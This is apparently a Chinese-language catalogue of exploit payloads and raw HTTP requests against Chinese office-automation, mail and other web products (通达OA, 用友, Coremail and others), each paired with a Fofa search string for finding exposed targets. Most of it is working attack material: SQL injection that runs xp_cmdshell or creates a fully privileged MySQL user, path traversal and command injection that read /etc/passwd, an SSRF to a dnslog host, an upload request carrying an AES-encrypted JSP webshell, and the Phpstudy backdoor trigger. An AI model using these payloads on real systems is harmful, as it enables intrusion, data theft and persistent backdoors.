POST /general/file_folder/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59 X-Resource-Type: xhr Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701 Connection: close Host: 192.168.202.1 Pragma: no-cache x-requested-with: XMLHttpRequest Content-Length: 82 x-wvs-id: Acunetix-Deepscan/209 Cache-Control: no-cache accept: */* origin: http://192.168.202.1 Accept-Language: en-US content-type: application/x-www-form-urlencoded; charset=UTF-8 CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign
POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true X-Resource-Type: xhr Cookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701 Connection: close Host: 192.168.202.1 Pragma: no-cache x-requested-with: XMLHttpRequest Content-Length: 97 x-wvs-id: Acunetix-Deepscan/186 Cache-Control: no-cache accept: */* origin: http://192.168.202.1 Accept-Language: en-US content-type: application/x-www-form-urlencoded; charset=UTF-8 m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--
通达oa 11.5 未授权访问漏洞
- POC | Payload | exp
/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=1597997506&view=agendaDay
通达 OA 任意文件上传漏洞+本地文件包含漏洞
-
相关文章
-
详情
-
2013
/ispirit/im/upload.php /ispirit/interface/gateway.php
-
2017
/ispirit/im/upload.php /mac/gateway.php
-
-
POC | Payload | exp
POST /mac/gateway.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Go-http-client/1.1 Connection: close Content-Length: 44 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip json={"url":"/general/../../mysql5/my.ini"}
通达OA v11.6 preauth RCE
-
描述
利用需要删除 auth.inc.php,可能会损坏OA系统
-
相关文章
-
POC | Payload | exp
通达OA v11.7 后台SQL注入
-
相关文章
-
POC | Payload | exp
需要登录权限
/general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=(SELECT count(*) FROM information_schema.columns A, information_schema.columns B where 1=1 and (LENGTH(database())=5)) /general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99)) 添加一个mysql用户 grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION 给创建的at666账户添加mysql权限 UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5)); 刷新数据库登录到数据库 /general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges; 通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录 /general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
通达OA v11.7 后台任意文件读取
- POC | Payload | exp
/ispirit/im/photo.php?AVATAR_FILE=c:/oa/bin/redis.windows.conf&UID=1
通达OA v11.7 后台敏感信息泄露
- POC | Payload | exp
/general/approve_center/archive/getTableStruc.php
通达OA v11.7 后台ssrf
- POC | Payload | exp
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=wqx0mc.dnslog.cn
通达OA v11.7 在线用户登录漏洞
-
相关文章
-
POC | Payload | exp
http://x.x.x.x/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 http://x.x.x.x/general/
通达oa 11.7 后台getshell
通达oa 11.8 后台getshell
-
相关文章
-
POC | Payload | exp
通达OA v11.9 upsharestatus 后台SQL注入漏洞
- POC | Payload | exp
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1 Content-Type: application/x-www-form-urlencoded uid=15&status=1&id=1;select sleep(4)
信呼
fofa: app="信呼-OA系统"
信呼 OA 存储型 XSS
-
影响版本
- 信呼 v1.9.0~1.9.1
-
相关文章
用友
Fofa: app="用友-UFIDA-NC"
相关工具
- jas502n/ncDecode - 用友nc数据库密码解密
- kezibei/yongyou_nc_poc
相关文章
用友 UFIDA OA 信息泄露
- POC | Payload | exp
/service/~iufo/com.ufida.web.action.ActionServlet? action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= # 登录进去后再访问信息泄露的地址,就有权限上传文件了。然后返回主页直接查看发表的内容就行了。
用友 UFIDA OA 任意文件读取
- Fofa: app="用友-UFIDA-NC"
- POC | Payload | exp
/NCFindWeb?service=IPreAlertConfigService&filename= /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml #数据库配置文件
用友 UFIDA OA SQLi
- POC | Payload | exp
/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute
用友 UFIDA OA Web Service 默认后台自动登录
- POC | Payload | exp
后台:/uapws/ 自动登录,默认密码:111111(6)
用友 UFIDA OA XXE
- POC | Payload | exp
/uapws/soapFormat.ajax msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///c:/windows/"> ]> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <soap:Fault> <faultcode>soap:Server%26xxe1two%3b</faultcode> </soap:Fault> </soap:Body> </soap:Envelope>%0a
用友 UFIDA OA Web Service SQLi
- POC | Payload | exp
/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl /uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl POST包: POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1 Host: **xxx.xxx.com** User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 646 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:exportCurrtypeToCrm> <string>1</string> </urn:exportCurrtypeToCrm> </SOAP-ENV:Body></SOAP-ENV:Envelope>
致远 OA A6 setextno.jsp sql注入漏洞
- POC | Payload | exp
/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23 /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1) and 1=2 union select 1,2,3,4,5,concat(0x23,user(),0x23,version(),0x23),7--
CNNVD-201610-923 && 用友 GRP-U8 SQL 注入
- POC | Payload | exp
- 用友GRP-U8 SQL注入
- 用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923
- 用友 GRP-U8 SQL 注入复现 外加发一个通用注入点
- 用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923
POST /Proxy HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: host cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
用友 U8 OA test.jsp SQL注入漏洞
- Fofa: "用友U8-OA"
- POC | Payload | exp
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
用友 NCCloud FS文件管理SQL注入
- Fofa: "NCCloud"
- POC | Payload | exp
http://xxx.xxx.xxx.xxx/fs/ 使用 Sqlmap 对 username 参数 进行 SQL 注入
用友 NC DeleteServlet 反序列化
用友 NC XbrlPersistenceServlet反序列化
- POC | Payload | exp
用友 NC FileReceiveServlet反序列化
-
相关文章
-
POC | Payload | exp
用友 NC monitorservlet 反序列化
- 相关文章
用友 NC ServiceDispatcherServlet 反序列化
- 相关文章
CNVD-2022-60632 用友畅捷通T+ 文件上传
新点
Fofa : app="新点OA"
敏感信息泄露漏洞
- POC | Payload | exp
/ExcelExport/人员列表.xls 通过获取的登录名登陆后台(默认密码11111)
万户
fofa: app="万户网络-CMS"
万户ezeip 3.0任意文件下载
- POC | Payload | exp
/download.ashx?files=../web.config
ezEIP 4.0 SQL注入
- POC | Payload | exp
POST /label/ajax/hit.aspx HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded type=0&colid=3&itemid=6&f=hits'
EzEIP 4.1.0 信息洩露漏洞
- POC | Payload | exp
GET /label/member/getinfo.aspx Cookie: WHIR_USERINFOR=whir_mem_member_pid=1;
红帆
Fofa : app="红帆-ioffice"
老版本 SQL注入
- POC | Payload | exp
POST /ioffice/prg/set/wss/ioCtlSet.asmx HTTP/1.1 Host: **.**.**.** SOAPAction: "http://**.**.**.**/SignOut" Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://**.**.**.**/soap/envelope/" xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema"> <soap:Body> <SignOut xmlns="http://**.**.**.**/"> <SessionID>'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'</SessionID> </SignOut> </soap:Body> </soap:Envelope>
金和
Fofa : app="Jinher-OA"
金和OA C6 download.jsp 任意文件读取漏洞
- POC | Payload | exp
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
金和OA C6 EditMain.aspx 后台文件写入漏洞
- POC | Payload | exp
/C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx /C6/JHSoft.Web.Portal/Default/cmdshell.aspx
金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞
- POC | Payload | exp
/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330
华天
Fofa : app="华天动力-OA8000"
workFlowService SQL注入漏洞
- POC | Payload | exp
POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1 <buffalo-call> <method>getDataListForTree</method> <string>select user()</string> </buffalo-call>
SuiteCRM
CVE-2021-45897 SuiteCRM 远程命令执行漏洞
邮服
Exchange
亿邮电子邮件系统
fofa: body="亿邮电子邮件系统"
亿邮电子邮件系统远程命令执行
- POC | Payload | exp
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: x.x.x.x Content-Length: 25 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36 type='|cat /etc/passwd||'
Coremail
Coremail 论客邮件系统于2000年首发,是中国第一套中文邮件系统。是网易等运营商至今一直使用的邮件系统,也是政府机关、大学、金融机构、上市公司及其他大型企业(包含国有企业)广泛使用的邮件系统。
相关工具
- dpu/coremail-address-book - Coremail邮件系统组织通讯录一键导出
版本信息
- POC | Payload | exp
/coremail/s/json?func=verify
爆破用户名
- POC | Payload | exp
/coremail/s?func=user:getLocaleUserName { "email":"zhangsan" "defaultURL":"1" }
任意密码修改
配置文件信息泄漏
- POC | Payload | exp
/mailsms/s?func=ADMIN:appState&dumpConfig=/
CVE-2020-29133 Coremail 存储型XSS
- POC | Payload | exp
coremail/XT5/jsp/upload.jsp 上传 1.jpg.html
目录穿越泄漏后台漏洞
-
相关文章
-
描述
访问过去会直接跳转到 tomcat 控制台,这里你就可以采用 coremail/coremail 弱口令尝试登陆,或者暴力破解。然后就是部署 war 包 Getshell 就 ok 了。
-
POC | Payload | exp
/lunkr/cache/;/;/../../manager.html
文件上传
-
POC | Payload | exp
POST /webinst/action.jsp HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 99 func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20shenye
/coremail/justtest.jsp
Other
NVMS-1000
Fofa : app="TVT-NVMS-1000"
路径遍历漏洞
- POC | Payload | exp
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: **.**.**.** Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Connection: close
远秋医学技能考试系统
Fofa : 远秋医学技能考试系统
SQL注入漏洞
- POC | Payload | exp
/NewsDetailPage.aspx?key=news&id=1
汉王人脸考勤管理系统
Fofa : title="汉王人脸考勤管理系统"
万能密码
- POC | Payload | exp
用户名 user: or' or 1=1-- 密码 or
SQL 注入
- POC | Payload | exp
POST /Login/Check HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 26 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://xxx.xxx.xxx.xxx:10000 Referer: http://xxx.xxx.xxx.xxx:10000/Login/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: ASP.NET_SessionId=yr1cr5dd5c4g5tl33pu2yyep Connection: close strName=admin&strPwd=admin
会捷通云视讯平台
相关文章
登陆逻辑漏洞
- POC | Payload | exp
修改错误返回包 为正确的返回包 {"token":null,"result":null}
任意文件读取
- POC | Payload | exp
POST /fileDownload?action=downloadBackupFile HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 fullPath=/etc/passwd
目录遍历
- POC | Payload | exp
/him/api/rest/V1.0/system/log/list?filePath=../
好视通视频会议系统
fofa: app="Hanming-Video-Conferencing"
任意文件下载
- POC | Payload | exp
/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
和信云桌面
fofa: body="和信下一代云桌面"
核心创天云桌面系统远程命令执行
- POC | Payload | exp
POST /Upload/upload_file.php?l=test HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv Content-Length: 183 ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: image/avif <?php phpinfo(); ?> ------WebKitFormBoundaryfcKRltGv--
联软准入系统
联软准入系统任意文件上传
- POC | Payload | exp
- 联软准入系统任意文件上传
POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp" Content-Type: image/png <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; name="uploadpath" ../webapps/notifymsg/devreport/ -----------------------------570xxxxxxxxx6025274xxxxxxxx1--
- 联软准入系统任意文件上传
ClusterEngine
Fofa: title="TSCEV4.0"
CVE-2020-21224
华视美达
相关文章
Centos-Web-Panel
CVE-2018-18323
- POC | Payload | exp
/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
CVE-2021-45467
- 相关文章
- CVE-2021-45467: CWP CentOS Web Panel - preauth RCE -
stristr()
绕过
- CVE-2021-45467: CWP CentOS Web Panel - preauth RCE -
WebPageTest
相关文章
Oracle Access Manager
CVE-2021-35587
RDWA
相关工具
- p0dalirius/RDWArecon - A python script to extract information from a Microsoft Remote Desktop Web Access (RDWA) application
Phpstudy
Phpstudy 后门 RCE
- POC | Payload | exp
GET /1.php HTTP/1.1 Host: example.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9 Accept-Encoding:gzip,deflate Accept-Charset:这里就是要执行的命令base64加密 c3lzdGVtKCdjYWxjLmV4ZScpOw== Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282 Connection: close
PhpStudy nginx 解析漏洞
-
描述
此次漏洞是 Nginx 的解析漏洞,由于 phpstudy 中配置文件的不当,造成了 / xx.php 解析漏洞,故此将文件解析为 php 运行。
-
相关文章
-
POC | Payload | exp
需要把 php 恶意文件上传到服务器。<?php phpinfo();?>
通过 /x.txt/x.php 方式访问上传的图片地址,解析 php 代码。
点击关注,共同学习!
安全狗的自我修养